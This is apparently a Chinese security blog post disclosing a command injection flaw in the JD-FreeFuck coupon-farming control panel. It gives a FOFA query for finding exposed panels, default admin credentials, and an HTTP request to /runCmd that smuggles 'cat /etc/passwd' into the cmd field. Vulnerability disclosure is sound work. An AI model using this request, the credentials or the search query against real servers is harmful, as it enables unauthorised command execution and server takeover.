当前位置:网站首页>JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞
2022-04-23 18:04:00 【孤桜懶契】
漏洞描述
i
JD-FreeFuck 存在后台命令执行漏洞,由于传参执行命令时没有对内容过滤,导致可以执行任意命令,控制服务器 项目地址: https://github.com/meselson/JD-FreeFuck
漏洞影响
s
JD-FreeFuck
空间测绘
d
FOFA:title="京东薅羊毛控制面板"
漏洞复现
- 访问后登录页面如下

- 默认账号
useradmin/supermanito
POST /runCmd HTTP/1.1
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

个人博客
孤桜懶契:https://gylq.gitee.io/time
版权声明
本文为[孤桜懶契]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_35938621/article/details/124356729
边栏推荐
- proxy server
- C network related operations
- Notes on common basic usage of eigen Library
- Auto. JS custom dialog box
- Implement a simple function to calculate the sum of all integers between M ~ n (m < n)
- 2022 Shanghai safety officer C certificate operation certificate examination question bank and simulation examination
- Crawl lottery data
- Flash operates on multiple databases
- _ FindText error
- .104History
猜你喜欢

Gobang game based on pyGame Library

C language loop structure program

C medium? This form of

2022江西光伏展,中国分布式光伏展会,南昌太阳能利用展

解决允许在postman中写入注释请求接口方法

Re expression régulière

Calculation of fishing net road density

Clion installation tutorial

2022 Shanghai safety officer C certificate operation certificate examination question bank and simulation examination

MySQL_01_简单数据检索
随机推荐
纳米技术+AI赋能蛋白质组学|珞米生命科技完成近千万美元融资
Rewrite four functions such as StrCmp in C language
Nat Commun|在生物科学领域应用深度学习的当前进展和开放挑战
Svn simple operation command
Go language JSON package usage
20222 return to the workplace
C language input and output (printf and scanf functions, putchar and getchar functions)
C network related operations
ROS package NMEA_ navsat_ Driver reads GPS and Beidou Positioning Information Notes
Jenkspy package installation
Box pointer of rust
QTableWidget使用讲解
解决允许在postman中写入注释请求接口方法
Pointers in rust: box, RC, cell, refcell
Scikit learn sklearn 0.18 official document Chinese version
Classes and objects
[UDS unified diagnostic service] (Supplement) v. detailed explanation of ECU bootloader development points (1)
C1 notes [task training part 2]
Rust: how to match a string?
Implement a simple function to calculate the sum of all integers between M ~ n (m < n)